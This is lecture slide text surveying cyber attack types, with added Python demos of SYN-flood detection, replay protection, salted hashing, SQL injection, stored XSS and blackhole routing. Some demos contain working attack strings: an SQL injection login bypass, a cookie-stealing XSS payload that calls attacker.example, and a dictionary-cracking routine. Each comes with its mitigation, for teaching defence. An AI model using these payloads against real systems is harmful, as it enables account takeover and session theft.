Cyber attacks
1. Overview of Cyber Attacks
Dr. Anuradha T
Department of Computer Science and
Engineering
PDA College of Engineering, Kalaburagi
17-Mar-19 1
2. Topics to be Covered
• What is a Cyber Attack
• What Does a Cyber Attack Look Like
• How Cyber Attacks Are Classified
• Types of Cyber Attacks
• How to Prevent Cyber Attacks
• Security Attacks
• Classification of Security Attacks
• Network Management Tools
• Research Areas
3. What is a Cyber Attack?
• Cyber is a prefix used in a growing number of technology
and IT terms to describe things made possible by the
spread of computers and networks.
• A cyber attack is a deliberate attempt by an attacker to gain
unauthorized access to, disrupt, damage or destroy a computer
system or network, or the data it holds.
4. What Does a Cyber Attack Look Like?
• An email appears to come from your bank or credit card
company. It seems urgent and includes a link to click. If you
look closely at the message, you can usually find clues that it
is not genuine: a sender address that does not match the bank's
domain, a link whose real target differs from its visible text,
or pressure to act immediately.
• Another way is downloading a file that carries malicious
code, typically a worm or Trojan horse.
• This can happen with email attachments, but it can also
happen when you download apps, videos and music files online.
• As soon as the file is opened, the computer is infected: a
virus or worm begins to spread, and a Trojan installs its
hidden payload.
5. Cyber Attacks Classified
• Syntactic attacks
• Semantic attacks
• Syntactic attacks use malicious software that attacks your
computer through various channels.
• The most frequent types of software used in syntactic
attacks include:
• Viruses: a virus is a piece of code that attaches itself to
another file or program and reproduces when that host is run.
It commonly arrives in file downloads and email attachments;
once activated it replicates into other files, and mass-mailing
variants send copies to every address in your contacts list.
6. • Worms: do not need a host file to replicate and spread.
They propagate on their own by exploiting vulnerable network
services or weak credentials on reachable hosts, and more
sophisticated worms also collect data and send it to a location
chosen by the attacker.
• A worm infects a computer when it reaches that computer over
the network, typically without any action by the user.
• Trojan horse: a program that appears useful or legitimate but
carries hidden malicious functionality. It is often delivered
through an email that looks like it comes from a trusted
company, when in fact it was sent by criminals or other bad actors.
7. Semantic Cyber Attacks
• Semantic attacks are more about changing the perception
or behavior of the person or organization being attacked.
• Less focus is placed on the software involved.
• Semantic cyber attacks, also known as social engineering,
manipulate human users' perceptions and interpretations
of computer-generated data in order to obtain valuable
information (such as passwords, financial details and
classified government information) from the users through
fraudulent means. Social-engineering techniques include
phishing—in which attackers send seemingly…
11. Different Types of Cyber Attacks
[Figure 2. Types of Cyber Attacks (image not reproduced)]
12. Denial-of-service (DoS) and
distributed denial-of-service (DDoS)
attacks
• A denial-of-service attack overwhelms a system's resources
(bandwidth, connection tables, CPU, memory) so that it cannot
respond to legitimate service requests.
• A DDoS attack targets the same resources, but it is launched
from a large number of other hosts that are infected with
malware controlled by the attacker (a botnet).
• Unlike attacks designed to enable the attacker to gain or
increase access, denial-of-service gives the attacker no direct
access; its value is disruption, extortion, or cover for another
intrusion happening at the same time.
• The most common DoS and DDoS techniques are the TCP SYN flood,
the teardrop attack, the smurf attack and the ping of death,
today usually launched from botnets.
13. TCP SYN flood attack
• The attacker exploits the buffer space used during the TCP
three-way handshake: it sends a stream of SYN packets, often with
spoofed source addresses, and never completes the handshake, so
the target's half-open connection queue fills up and new
legitimate connections are refused.
Teardrop attack
• The attacker sends IP fragments whose length and fragmentation
offset fields overlap one another; vulnerable (mainly older) IP
stacks crash or hang while trying to reassemble them.
Smurf attack
• The attacker sends ICMP echo requests to a network's broadcast
address with the source address spoofed to the victim's address;
every host on that network replies to the victim, amplifying the
traffic.
Ping of death attack
• The attacker sends an ICMP echo request split into fragments
that reassemble to more than the 65,535-byte IPv4 maximum,
crashing vulnerable stacks. It can be blocked by a firewall or
host stack that checks the reassembled size of fragmented IP
packets against the maximum.
Botnets
• Botnets are large numbers of systems (sometimes millions)
infected with malware under the attacker's control and used to
launch DDoS attacks; they are the infrastructure behind most
large floods rather than a distinct attack type.
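The two checks below are an added example (not part of the slides) of how the SYN-flood and fragment-based attacks described above can be recognised in captured traffic. The packet records, the 198.51.100.0/24 and 192.0.2.0/24 addresses, and the thresholds are constructed for the demonstration; a real detector would read them from a capture or a flow exporter.

```python
"""Added example (not from the slides): detection checks for two of the
DoS mechanisms described above, run over constructed packet records.
Addresses, thresholds and the record layout are assumptions for the demo."""
from collections import defaultdict

# An IPv4 datagram is at most 65535 bytes including a 20-byte header, so a
# reassembled payload longer than this is a ping of death.
IP_MAX_PAYLOAD = 65535 - 20

# Constructed records: (src_ip, dst_ip, proto, tcp_flags). Not a real capture.
SAMPLE_PACKETS = [
    ("10.0.0.5", "192.0.2.10", "tcp", {"SYN"}),           # normal client
    ("10.0.0.5", "192.0.2.10", "tcp", {"ACK"}),           # completes handshake
    ("10.0.0.5", "192.0.2.10", "tcp", {"ACK", "PSH"}),    # sends data
] + [
    # 40 spoofed sources each send one SYN and never answer the SYN-ACK
    ("198.51.100.%d" % i, "192.0.2.10", "tcp", {"SYN"}) for i in range(1, 41)
]


def half_open_counts(packets):
    """Per-source count of SYNs that were not followed by an ACK from the
    same source (an approximation of half-open handshakes)."""
    syn = defaultdict(int)
    ack = defaultdict(int)
    for src, _dst, proto, flags in packets:
        if proto != "tcp":
            continue
        if "SYN" in flags and "ACK" not in flags:
            syn[src] += 1
        elif "ACK" in flags and "SYN" not in flags:
            ack[src] += 1
    return {s: max(syn[s] - ack[s], 0) for s in syn}


def syn_flood_suspects(packets, target, per_source=1, min_sources=20):
    """Flag a SYN flood against `target` when many distinct sources leave
    half-open connections behind; returns the sorted list of those sources,
    or [] when the count stays below the threshold."""
    counts = half_open_counts([p for p in packets if p[1] == target])
    suspects = sorted(s for s, n in counts.items() if n >= per_source)
    return suspects if len(suspects) >= min_sources else []


def fragment_check(fragments, max_payload=IP_MAX_PAYLOAD):
    """Reassembly sanity check for one IP datagram.

    fragments: list of (offset_bytes, payload_len, more_fragments) tuples.
    Returns 'teardrop' if a fragment starts inside the previous one,
    'ping_of_death' if the reassembled payload exceeds max_payload, else 'ok'.
    """
    end = 0
    total = 0
    for offset, length, _more in sorted(fragments):
        if offset < end:          # overlapping offsets: the teardrop signature
            return "teardrop"
        end = offset + length
        total = max(total, end)
    if total > max_payload:
        return "ping_of_death"
    return "ok"
```

The half-open heuristic deliberately counts per source so that one busy but legitimate client (many SYNs, many ACKs) is not flagged, while a flood from spoofed addresses shows up as many sources with exactly one unanswered SYN each; the fragment check is the same test the slide suggests a firewall should apply before forwarding fragments to the host.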
14. Man-in-the-middle (MitM) attack
• A MitM attack occurs when an attacker inserts itself between
a client and a server, relaying and possibly altering the traffic
while both sides believe they are talking to each other directly.
Example: Session hijacking
• The attacker takes over an established session between a trusted
client and a network server. The attacking computer substitutes its
IP address (or the stolen session token) for the trusted client's
while the server continues the session, believing it is still
communicating with the client.
Example: IP spoofing
• IP spoofing is used by an attacker to convince a system that
it is communicating with a known, trusted entity, giving the
attacker access it would not otherwise have.
15. • The attacker sends a packet with the IP source address of a
known, trusted host instead of its own IP source address to
a target host. If the target authenticates by source address
alone, it may accept the packet and act upon it.
Example: Replay
• A replay attack occurs when an attacker intercepts and saves
valid messages and then sends them again later, impersonating
one of the participants. A timestamp, nonce or sequence number
bound into each message's authentication tag lets the receiver
reject repeats.
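The following is an added example, not code from the slides, showing the replay attack described above against a simple authenticated message and the checks that defeat it. The shared key, the message format and the 30-second freshness window are assumptions made for the demonstration.

```python
"""Added example (not from the slides): a replay attack against a simple
HMAC-authenticated message, and the nonce/timestamp checks that defeat it.
Key, message layout and clock-skew window are constructed for the demo."""
import hashlib
import hmac
import json

SHARED_KEY = b"demo-shared-secret"   # assumed pre-shared key, not from the page


def make_message(key, sender, body, nonce, ts):
    """Sender side: the nonce and timestamp are inside the MAC'd payload,
    so a party in the middle cannot change them without breaking the tag."""
    fields = {"from": sender, "body": body, "nonce": nonce, "ts": ts}
    payload = json.dumps(fields, sort_keys=True).encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return {"payload": payload, "tag": tag}


class Receiver:
    def __init__(self, key, max_skew=30):
        self.key = key
        self.max_skew = max_skew      # seconds of clock skew tolerated
        self.seen_nonces = set()      # nonces already accepted

    def accept(self, msg, now):
        payload, tag = msg["payload"], msg["tag"]
        expected = hmac.new(self.key, payload, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, tag):
            return "reject: bad mac"      # forged or tampered in transit
        fields = json.loads(payload)
        if abs(now - fields["ts"]) > self.max_skew:
            return "reject: stale"        # captured long ago, replayed late
        if fields["nonce"] in self.seen_nonces:
            return "reject: replay"       # exact repeat of an accepted message
        self.seen_nonces.add(fields["nonce"])
        return "accept"


def demo():
    """Legitimate delivery, then three attacks on the same channel."""
    rx = Receiver(SHARED_KEY)
    now = 1_700_000_000
    msg = make_message(SHARED_KEY, "alice", "transfer 100 to bob", nonce="n-1", ts=now)
    results = [rx.accept(msg, now)]
    results.append(rx.accept(msg, now + 5))       # attacker resends the capture
    forged = dict(msg, payload=msg["payload"].replace(b"100", b"900"))
    results.append(rx.accept(forged, now))        # tampered amount, same tag
    old = make_message(SHARED_KEY, "alice", "hello", nonce="n-2", ts=now - 3600)
    results.append(rx.accept(old, now))           # valid tag, but an hour old
    return results
```

The nonce set alone would grow without bound; the timestamp window is what lets a real receiver expire old nonces, which is why both checks are needed together.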
17. Phishing and spear phishing attacks
• Phishing is the practice of sending emails that appear to come
from trusted sources with the goal of obtaining personal
information or credentials.
• It may involve an attachment that loads malware onto your
computer, or a link to a fake login page.
• In spear phishing, attackers take the time to research their
targets and create messages that are personal and relevant to them.
• One of the simplest ways to conduct a spear phishing attack is
email spoofing, in which the sender information is forged so the
message appears to come from someone you know very well.
18. Drive-by attack
• Drive-by download attacks are a common method of
spreading malware.
• Attackers look for insecure websites and plant a malicious
script in the HTML or JavaScript of one of the pages.
• This script may install malware directly onto the computer of
anyone who visits the site, usually by exploiting an unpatched
browser or plugin, or redirect the visitor to a site the
attackers control.
• To protect yourself from drive-by attacks, keep your browsers,
plugins and operating systems up to date and avoid keeping
unnecessary apps and browser extensions on your device.
19. Password attack
• Access to a person's password can be obtained by looking
around the person's desk, sniffing the network connection to
capture unencrypted passwords, using social engineering,
gaining access to a password database, or outright guessing.
• Brute-force password guessing means systematically trying
many candidate passwords in the hope that one of them works.
20. • Dictionary attack: a list of common passwords is tried
against a user's account. One offline approach is to copy the
file of hashed passwords, apply the same hash function to a
dictionary of commonly used passwords, and compare the results;
every match reveals a password.
• To protect against dictionary and brute-force attacks,
implement an account lockout or rate-limiting policy that
triggers after a few invalid attempts, and store passwords with
a per-user salt and a slow hash (bcrypt, scrypt, Argon2 or
PBKDF2) so that offline guessing is expensive.
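The example below is added here and is not from the slides. It performs the offline dictionary attack just described against an unsalted SHA-256 password file, then against the same accounts stored with a per-user salt and PBKDF2, to show why the salted, slow scheme removes the attacker's ability to precompute one table for everyone. The accounts, passwords and wordlist are constructed; the iteration count is kept low for speed and would be far higher in production.

```python
"""Added example (not from the slides): the dictionary attack described
above against unsalted hashes, and the same attack against salted PBKDF2
hashes. Accounts, passwords and the wordlist are constructed."""
import hashlib
import os

WORDLIST = ["123456", "password", "letmein", "qwerty", "summer2019", "Tr0ub4dor&3"]

# Constructed accounts; "carol" uses a passphrase that is not in the wordlist
USERS = {"alice": "letmein", "bob": "summer2019", "carol": "correct horse battery"}


def make_unsalted(users):
    """How a weak system stores passwords: one plain SHA-256 per user."""
    return {u: hashlib.sha256(p.encode()).hexdigest() for u, p in users.items()}


def make_salted(users, iterations):
    """Per-user random salt plus PBKDF2-HMAC-SHA256 with a work factor."""
    out = {}
    for u, p in users.items():
        salt = os.urandom(16)
        out[u] = (salt, hashlib.pbkdf2_hmac("sha256", p.encode(), salt, iterations))
    return out


def crack_unsalted(stored, wordlist):
    """One hash per word serves every account: hash the dictionary once,
    then look each stored hash up in the table."""
    table = {hashlib.sha256(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table[h] for user, h in stored.items() if h in table}


def crack_salted(stored, wordlist, iterations):
    """With a unique salt per user the whole wordlist must be rehashed for
    every account, and each guess costs `iterations` PBKDF2 rounds."""
    found = {}
    for user, (salt, h) in stored.items():
        for w in wordlist:
            if hashlib.pbkdf2_hmac("sha256", w.encode(), salt, iterations) == h:
                found[user] = w
                break
    return found


def guess_cost(n_users, n_words, iterations, salted):
    """Number of hash computations the attacker must perform."""
    return n_words * (n_users * iterations if salted else 1)
```

Both attacks still recover the two weak passwords, which is the real lesson: salting and a slow hash raise the attacker's cost per account (here by a factor of users times iterations), but they do not rescue a password that is in the dictionary.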
21. SQL injection attack
• SQL injection has become a common issue with database-
driven websites.
• It occurs when an attacker supplies input that the application
concatenates into a SQL query sent to the database, so the input
is interpreted as SQL rather than as data.
• SQL commands are inserted into data-plane input in order to
run commands the developer never intended.
• A successful SQL injection exploit can read sensitive data
from the database, modify (insert, update or delete)
database data, execute administration operations (such as
shutdown) on the database, recover the content of a given
file, and, in some cases, issue commands to the operating
system.
• The standard defence is parameterized queries (prepared
statements), which keep user input in the data plane.
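As an added example (not code from the slides), here is the injection described above against an in-memory SQLite table, side by side with the parameterized query that stops it. The table, accounts and payload are constructed; passwords are stored in clear only to keep the demonstration short.

```python
"""Added example (not from the slides): a login query built by string
concatenation, the injection that bypasses it, and the parameterized form.
Table contents are constructed; real systems store password hashes."""
import sqlite3


def setup():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return db


def login_vulnerable(db, name, password):
    """Client input is spliced into the query text, so quotes in the input
    change the query's structure. Returns the role on success, else None."""
    query = ("SELECT role FROM users WHERE name = '%s' AND password = '%s'"
             % (name, password))
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, name, password):
    """Placeholders send the query text and the values separately; the
    input can never become SQL, whatever characters it contains."""
    row = db.execute("SELECT role FROM users WHERE name = ? AND password = ?",
                     (name, password)).fetchone()
    return row[0] if row else None


# Constructed payload: closes the password literal and appends a condition
# that is always true, so the WHERE clause matches every row.
PAYLOAD = "' OR '1'='1"
```

With the payload in the password field the vulnerable query becomes `... AND password = '' OR '1'='1'`, which matches every row and returns the first one (the admin account) without any valid password; the parameterized version compares the literal string `' OR '1'='1` against the stored password and finds nothing.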
22. Cross-site scripting (XSS) attack
• XSS attacks use a trusted website to run attacker-controlled
scripts in the victim's web browser or scriptable application.
• In stored XSS, the attacker injects a payload containing
malicious JavaScript into the website's database, for example
through a comment or profile field.
• When the victim requests a page from the website, the website
sends the page with the attacker's payload as part of the HTML
body, and the victim's browser executes the script because it
arrived from the trusted site.
• The script might send the victim's cookie to the attacker's
server, and the attacker can then use it for session hijacking.
Output encoding of untrusted data, a Content Security Policy and
the HttpOnly cookie flag are the usual mitigations.
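The block below is an added example, not from the slides, of the stored XSS flow just described in a toy comment page: the payload is stored as-is, then rendered once without and once with output encoding. The comment store, the rendering functions and the attacker URL are constructed for the demonstration.

```python
"""Added example (not from the slides): stored XSS in a toy comment page,
rendered unescaped (vulnerable) and escaped (safe). Data is constructed."""
import html

COMMENTS = []   # stands in for the website's database


def post_comment(text):
    """Stores the comment exactly as submitted, as the slide describes."""
    COMMENTS.append(text)


def render_vulnerable():
    """Interpolates stored text straight into the HTML body."""
    return "<ul>" + "".join("<li>%s</li>" % c for c in COMMENTS) + "</ul>"


def render_safe():
    """Escapes <, >, &, and quotes so the payload is displayed as text."""
    return "<ul>" + "".join("<li>%s</li>" % html.escape(c, quote=True)
                            for c in COMMENTS) + "</ul>"


# Constructed payload: exfiltrates the session cookie to an attacker host
PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"


def contains_script(page):
    """Crude indicator used by the demo: a live <script> tag in the output."""
    return "<script>" in page.lower()


def demo():
    """Returns (vulnerable_page, safe_page) for one benign and one hostile comment."""
    COMMENTS.clear()
    post_comment("nice post")
    post_comment(PAYLOAD)
    return render_vulnerable(), render_safe()
```

Escaping at output time is the right layer because the same stored string may later be placed in HTML, in an attribute, or in JavaScript, each of which needs its own encoding; the HttpOnly flag additionally keeps `document.cookie` empty for the script even if escaping is missed somewhere.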
24. Eavesdropping attack
• Eavesdropping attacks occur through the interception of
network traffic.
• By eavesdropping, an attacker can obtain passwords, credit
card numbers and other confidential information that a user
sends over the network unencrypted.
• Eavesdropping can be passive or active:
• Passive eavesdropping: the attacker obtains the information
simply by listening to message transmissions on the network.
25. • Active eavesdropping: the attacker actively obtains
information by disguising itself as a friendly unit and
sending queries to transmitters. This is called probing,
scanning or tampering.
• Preventing passive eavesdropping is often more important than
spotting active attacks, since the active phase depends on
knowledge of the friendly units gained by passive eavesdropping
first. Because passive listening leaves no trace on the wire,
the practical control is encrypting traffic in transit (TLS,
SSH, VPN) rather than trying to detect the listener.
26. Birthday attack
• Birthday attacks are made against hash functions that are
used to verify the integrity of a message, software or
digital signature.
• A message processed by a hash function produces a message
digest (MD) of fixed length, independent of the length of the
input message. For a collision-resistant hash the MD effectively
characterizes the message, but since there are more possible
messages than digests, distinct messages with the same MD must
exist.
27. • The birthday attack exploits the probability of finding two
random messages that produce the same MD: because any pair of
messages may collide, an n-bit digest is expected to yield a
collision after roughly 2^(n/2) hash computations rather than
the 2^n needed to match one specific digest.
• If an attacker prepares two messages with the same MD, one
harmless that the victim signs and one malicious, the signature
on the first is also valid for the second, and a receiver who
compares MDs cannot detect the replacement.
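The following added example (not from the slides) computes the birthday bound for an n-bit digest and then runs a generic collision search against SHA-256 truncated to 32 bits, to show that the bound is reached in practice at a cost far below 2^32. The truncation and the counter-based messages are constructed for the demonstration; full SHA-256 is not affected at any feasible cost.

```python
"""Added example (not from the slides): the birthday bound and a collision
search against a truncated SHA-256. Truncation length and message prefix
are constructed for the demo."""
import hashlib
import math


def birthday_bound(bits, p=0.5):
    """Approximate number of random messages needed for probability p of
    at least one collision among 2**bits equally likely digest values:
    n ~ sqrt(2 * N * ln(1/(1-p))) with N = 2**bits."""
    return math.sqrt(2 * (2 ** bits) * math.log(1 / (1 - p)))


def truncated_digest(msg, bits):
    """Top `bits` bits of SHA-256(msg), standing in for a short hash."""
    d = int.from_bytes(hashlib.sha256(msg).digest(), "big")
    return d >> (256 - bits)


def find_collision(bits, prefix=b"msg-"):
    """Generic birthday search: hash distinct messages until a digest repeats.
    Returns (message_a, message_b, hashes_computed)."""
    seen = {}
    i = 0
    while True:
        m = prefix + str(i).encode()
        d = truncated_digest(m, bits)
        if d in seen:
            return seen[d], m, i + 1
        seen[d] = m
        i += 1
```

The search needs about sqrt(2^32 * 2 ln 2), roughly 77,000 hashes, which is why digest length must be chosen for 2^(n/2) work, not 2^n: a 64-bit hash gives only 32-bit collision resistance.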
28. Malware attack
• Malicious software (malware) can be described as unwanted software
that is installed on your system without your consent. It can attach
itself to legitimate code and propagate, lurk inside useful
applications, or replicate itself across the Internet. Some of the
most common types of malware are:
• Macro viruses —
• File infectors —
• System or boot-record infectors —
• Polymorphic viruses — These viruses conceal
• Stealth viruses
• Trojans —
• Logic bombs
• Worms —
• Droppers —
• Ransomware —
29. How to Prevent Cyber Attacks
Steps you can take to reduce your risk of falling victim to a
costly cyber attack:
• Train employees in cyber security principles.
• Install, use and regularly update antivirus and antispyware
software on every computer used in your business.
• Use a firewall for your Internet connection.
• Download and install software updates for your operating
systems and applications as they become available.
30. • Make backup copies of important business data and
information, and keep at least one copy offline.
• Control physical access to your computers and network
components.
• Secure your Wi-Fi networks. If you have a Wi-Fi network for
your workplace, make sure it uses WPA2 or WPA3 encryption with a
strong passphrase; hiding the SSID alone gives little protection.
• Require individual user accounts for each employee.
• Limit employee access to data and information and limit
authority to install software.
• Regularly change passwords.
31. • Use patches. All it takes is a tiny hole in your system for
attackers to poke their way in.
• Protect outbound data. Just as you protect your system
from incoming malware and bots with a firewall, you need
to make sure certain data never leaves your system. It is
important to focus on egress filtering, to prevent rogue
employees, or employees making honest mistakes, from
releasing sensitive data or malicious software from your
network.
• Raise awareness. It is important for everyone in the
organization to be savvy and alert about security issues.
• Be smart about passwords.
• Don't ignore physical security.
• Encrypt data.
• Purchase a cyber insurance policy.
32. Classification of security attacks
• Attacks can be classified into two broad categories,
namely active and passive attacks.
• An attacker can exploit the network either as an internal or
an external party, and either actively or passively.
• Active attack: the aim of an active attack is to alter the data
being exchanged in the network and thus disrupt the regular
functioning of the network. The intruder can modify packets,
inject packets and drop packets. Such attacks are very dangerous,
but because they disturb normal network operation they are also
observable.
20-10-2018 32
33. • Passive attack: the aim of a passive attack is to snoop on
confidential information, such as routing information that
should stay secret during communication, without disturbing
normal network operation. It obtains such information but does
not modify it.
• Active attacks can be external or internal, as discussed below:
• External attack: external attackers exist outside the network
and want to gain access to it. Once they get access, they start
sending bogus packets and performing denial of service in order
to disrupt the performance of the whole network.
34. • These attacks can be mitigated by security measures such as
a firewall, which restricts access by unauthorized parties to
the network.
• Internal attack: in an internal attack, the attacker has
normal access to the network and participates in its normal
activities.
• The attacker gains access to the network as a new node,
either by compromising an existing node or by malicious
impersonation.
• The impact of an internal attack is more severe than that of
an external attack, since perimeter controls do not see it.
Common examples of such attacks are the blackhole attack
(explained below) and the wormhole attack.
35. Security in different layers of the
protocol stack
• Application programs do not interact with the network
hardware directly; they interact with protocol software.
• The concept of a layered protocol stack gives a theoretical
basis for understanding how a collection of protocols works
together with the hardware to provide a robust communication
system.
• Different studies suggest different methods or techniques
for handling security issues at each layer.
36. Table 1 shows the different layers in the network protocol stack.
37. Blackhole attack
• The blackhole attack is one of the active and most severe attacks
in MANETs (mobile ad hoc networks). In Figure 5, node 1 is the source
node and node 4 the destination node; node 3 acts as the blackhole
(BH) node.
• When node 1 broadcasts a route request (RREQ), the blackhole node
immediately returns a false route reply (RREP) carrying a fabricated,
much higher destination sequence number. Node 1 therefore judges the
route discovery complete, selects the route through node 3, and starts
sending data packets to it, and node 3 drops or consumes all of them.
[Figure 5. A blackhole attack in the mobile ad hoc network: RREQ from
node 1, malicious RREP from node 3 (image not reproduced)]
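The following is an added example, not from the slides, that models the AODV-style route selection just described: the freshest reply (highest destination sequence number) wins, so the blackhole's inflated number captures the route. It also shows one simple sanity check a node can apply, rejecting replies whose sequence number jumps implausibly far above the last value known for the destination. The topology, sequence numbers and the jump threshold are constructed assumptions, and the check is a generic heuristic rather than any specific scheme the slides propose.

```python
"""Added example (not from the slides): AODV-style RREP selection with a
blackhole node, and a sequence-number plausibility check. Topology,
numbers and threshold are constructed."""

# Each route reply (RREP) as seen by the source: (next_hop, dest_seq_no, hop_count)
HONEST = ("node2", 25, 2)        # relayed from the real destination, node 4
BLACKHOLE = ("node3", 9999, 1)   # forged: huge sequence number, short path

# Constructed forwarding behaviour: node 3 silently drops everything
FORWARDS = {"node2": True, "node3": False}


def choose_route(rreps):
    """Plain AODV rule: prefer the highest destination sequence number
    (freshest route), break ties on the fewest hops."""
    return max(rreps, key=lambda r: (r[1], -r[2]))[0]


def choose_route_checked(rreps, known_seq, max_jump=10):
    """Discard replies whose sequence number exceeds the last known value for
    the destination by more than max_jump, then apply the normal rule.
    Returns None if no plausible reply remains."""
    plausible = [r for r in rreps if r[1] - known_seq <= max_jump]
    if not plausible:
        return None
    return choose_route(plausible)


def send_data(next_hop, n_packets):
    """Number of packets that actually reach the destination via next_hop."""
    return n_packets if FORWARDS[next_hop] else 0


def demo(known_seq=20, n_packets=10):
    """(delivered without check, delivered with check) for the same RREPs."""
    rreps = [HONEST, BLACKHOLE]
    naive = send_data(choose_route(rreps), n_packets)
    checked_hop = choose_route_checked(rreps, known_seq)
    checked = send_data(checked_hop, n_packets) if checked_hop else 0
    return naive, checked
```

The threshold check is deliberately crude: a legitimately stale source could also see a large jump after a long partition, which is why published secure-routing schemes combine it with other evidence (multiple replies, confirmation from the destination, or trust values) rather than relying on it alone.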
39. What is Wireshark?
• Wireshark is a network packet analyzer. A network packet
analyzer captures network packets and displays the packet data
in as much detail as possible.
• A network packet analyzer is a measuring device used to
examine what is going on inside a network cable, just as a
voltmeter is used by an electrician to examine what is going on
inside an electric cable.
• In the past, such tools were either very expensive, proprietary,
or both. However, with the advent of Wireshark, all that has
changed.
• Wireshark is perhaps one of the best open source packet
analyzers available today.
40. Some intended purposes
• Network administrators use it to troubleshoot network
problems
• Network security engineers use it to examine security
problems
• Developers use it to debug protocol implementations
• People use it to learn network protocol internals
41. What Wireshark is not
• Wireshark is not an intrusion detection system. It will not
warn you when someone does strange things on your network
that they are not allowed to do.
• However, if strange things happen, Wireshark might help
you figure out what is really going on.
• Wireshark will not manipulate things on the network; it
will only "measure" things from it.
• Wireshark does not send packets on the network or do
other active things (except for name resolution, and even
that can be disabled).
42. • Wireshark and TShark share a powerful filter engine that
helps remove the noise from a packet trace and lets you see
only the packets that interest you.
• If a packet meets the requirements expressed in your filter,
it is displayed in the list of packets.
• Display filters let you compare the fields within a protocol
against a specific value, compare fields against fields, and
check for the existence of specified fields or protocols. They
use Wireshark's own syntax (for example tcp.flags.syn == 1 &&
tcp.flags.ack == 0 to show bare SYNs), which differs from the
pcap capture-filter syntax used by Dumpcap and tcpdump.
• Wireshark can capture traffic from many different network
media types, and despite its name this includes wireless LAN.
• Installation steps for downloading Wireshark
43. Dumpcap
• Dumpcap is a network traffic dump tool. It lets you
capture packet data from a live network and write the
packets to a file.
• Dumpcap writes the libpcap (pcap) format, which is also the
format used by Wireshark, tcpdump and various other tools. Note
that current Dumpcap versions default to the newer pcapng format
and need the -P option to write classic pcap.
• Without any options set, it uses the pcap library to capture
traffic from the first available network interface and writes
the received raw packet data, along with each packet's
timestamp, to a capture file.
44. • If the -w option is not specified, Dumpcap writes to a newly
created capture file with a randomly chosen name.
• If the -w option is specified, Dumpcap writes to the file
named by that option.
• Packet capturing is performed with the pcap library, and the
capture filter syntax follows the rules of the pcap library
(the same BPF syntax as tcpdump, e.g. "tcp port 443"), which is
not the same as Wireshark's display filter syntax.
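The example below is added here and is not from the slides or from the Wireshark project: a minimal reader for the classic libpcap file format that Dumpcap writes with -P, exercised against a capture image constructed in memory so that it runs without an interface or capture privileges. The two fake frames and their timestamps are constructed; the header layout follows the published pcap format (24-byte global header, 16-byte record headers).

```python
"""Added example (not from the slides): build and parse a classic libpcap
file image. Packet contents are constructed placeholder frames."""
import struct

PCAP_MAGIC = 0xA1B2C3D4      # microsecond-resolution timestamps
LINKTYPE_ETHERNET = 1


def build_pcap(packets, linktype=LINKTYPE_ETHERNET, snaplen=65535):
    """Write a little-endian pcap image: global header, then one
    (ts_sec, ts_usec, incl_len, orig_len) header per packet plus its bytes."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, snaplen, linktype)
    for ts_sec, ts_usec, data in packets:
        out += struct.pack("<IIII", ts_sec, ts_usec, len(data), len(data)) + data
    return out


def read_pcap(blob):
    """Parse a pcap image. Returns (linktype, [(timestamp, bytes, orig_len)]).
    Handles both byte orders via the magic number and rejects truncated or
    oversized records instead of silently reading past the end."""
    if len(blob) < 24:
        raise ValueError("too short for a pcap global header")
    magic = struct.unpack("<I", blob[:4])[0]
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:         # same magic seen through the other byte order
        endian = ">"
    else:
        raise ValueError("not a classic libpcap file (magic %#x)" % magic)
    _major, _minor, _tz, _sig, snaplen, linktype = struct.unpack(
        endian + "HHiIII", blob[4:24])
    pos = 24
    packets = []
    while pos < len(blob):
        if len(blob) - pos < 16:
            raise ValueError("truncated record header at offset %d" % pos)
        ts_sec, ts_usec, incl_len, orig_len = struct.unpack(
            endian + "IIII", blob[pos:pos + 16])
        pos += 16
        if incl_len > snaplen or pos + incl_len > len(blob):
            raise ValueError("bad record length %d at offset %d" % (incl_len, pos))
        packets.append((ts_sec + ts_usec / 1e6, blob[pos:pos + incl_len], orig_len))
        pos += incl_len
    return linktype, packets


def is_valid_pcap(blob):
    """True if the whole image parses; used to reject damaged captures."""
    try:
        read_pcap(blob)
        return True
    except ValueError:
        return False


# Constructed sample: two placeholder Ethernet frames, not real traffic
SAMPLE_PCAP = build_pcap([(1, 500000, b"\xaa" * 60), (2, 0, b"\xbb" * 42)])
```

The length checks matter more than they look: pcap parsers in security tooling have historically been a soft target because a crafted record header can claim a length far beyond the file, and a reader that trusts it reads or allocates out of bounds.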
45. NetStumbler (Network Stumbler)
• It is a freely available Wi-Fi discovery tool that is compatible
only with Windows.
• With this program, one can search for wireless networks, including
open (unencrypted) ones that an attacker could join to infiltrate the
network.
• It is no longer maintained and has compatibility and network adapter
issues on newer Windows versions.
46. Key features of NetStumbler
• Verify that your network is set up the way you intended.
• Find locations with poor coverage in your WLAN.
• Detect other networks that might be causing interference
with your network.
• Detect unauthorized “rogue” access points in your
workplace.
47. NetStumbler can show the user:
• MAC address
• SSID
• Access point name
• Channel
• Vendor
• Security (WEP on or off)
• Signal strength and GPS coordinates (if a GPS device is
attached)
48. Honeypot
• A honeypot is a device placed on a computer network
specifically designed to attract and capture malicious
network traffic.
• A honeypot logs in great detail, capturing raw packet-level
data and even the keystrokes and mistakes made by attackers
once they interact with it.
• The captured information is highly valuable: since the
honeypot has no legitimate users, almost any traffic to it is
suspicious, so it produces little to no false positives.
• Honeypots have become one of the leading tools for monitoring
the latest tricks and exploits of attackers by recording their
every move, so that the security community can respond to new
exploits more quickly.
49. Snort
• Snort is an open-source network intrusion detection system
(NIDS): it inspects network traffic against a rule set and
raises an alert when someone tries to enter your network or
when traffic matches a known attack signature. It can also run
inline as an intrusion prevention system (IPS).
50. Topics for Research to be Taken Up
• Secure routing protocols based on graphs and cluster
classification can be explored.
• The proposed security-aware schemes can be applied to
proactive and hybrid protocols and their performance compared
with that of reactive protocols.
• Attacks on secure routing protocols can also be examined
using honeypots.
• The proposed protocols can also be evaluated against various
types of security attacks.